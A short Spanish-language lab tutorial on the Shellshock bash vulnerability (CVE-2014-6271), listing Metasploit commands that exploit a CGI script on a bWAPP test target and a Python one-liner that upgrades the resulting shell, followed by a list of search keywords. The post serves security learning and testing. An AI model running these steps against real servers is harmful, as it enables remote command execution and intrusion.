CVE-2014-6271 Grave vulnerabilidad en bash (CVE-2014-6271) permite la ejecución remota de comandos Web applications like cgi-scripts may be vulnerable based on a number of factors; including calling other applications through a shell, or evaluating sections of code through a shell.

LABORATORIO de TESTEO o PRUEBA

COMANDOS
Código: Seleccionar todo
msfconsole
search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
options o show options
set header Referer
set RHOSTS
set TARGETURI /bWAPP/cgi-bin/shellshock.sh
set LHOSTS
exploit
Código: Seleccionar todo
python -c 'import pty; pty.spawn("/bin/bash")'
Pentesting framework python perl synology xpenology ruby microsoft windows Security Technologie CVE-2014-6271 http servicio web apache cgi
network scan,scanner,python scan,oscp,ddos,learn security,unix,ubuntu,debian,red hat,oscp certification,ceh,try hack me,hacking,ethical hacker,ctf for beginners,ehtical hacking,cyber seguridad,security,linux,tool,penetration tests,herramienta,linux for ethical hackers,cursos,courses,capacitacion,educacion,How Hackers Do It,cyber security,bug,exploit,tutorial,proteger computadoras,Information Systems Security Professional,como usar kali linux,metasploit